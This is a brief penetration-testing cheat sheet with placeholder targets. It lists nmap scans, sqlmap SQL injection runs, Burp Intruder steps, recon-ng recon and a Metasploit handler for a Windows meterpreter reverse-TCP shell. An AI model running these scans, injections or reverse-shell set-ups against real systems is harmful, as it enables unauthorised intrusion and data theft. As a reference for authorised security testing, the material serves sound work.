Pentest Toolkit
Basic Scanning
nmap -sV -T4 -A -v [TARGET_IP]
nmap -p 1-65535 -sV -sS -T4 [TARGET_IP]
OS Detection
nmap -O [TARGET_IP]
Script Scanning
nmap -sC -sV [TARGET_IP]
nmap --script vuln [TARGET_IP]
Basic Commands
msfconsole
search [EXPLOIT_NAME]
Exploit Example
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [YOUR_IP]
set LPORT 4444
exploit
Basic Injection
sqlmap -u "http://[TARGET_URL]?id=1" --batch
Advanced Options
sqlmap -u "http://[TARGET_URL]" --data="username=admin&password=pass" --level=5 --risk=3 --dbms=mysql
Proxy Setup
Configure browser proxy to 127.0.0.1:8080
Intruder Usage
Capture request → Send to Intruder → Set payload positions → Add payloads → Start attack
Basic Setup
recon-ng
marketplace install all
Domain Recon
modules load recon/domains-hosts/google_site_web
options set SOURCE [TARGET_DOMAIN]
run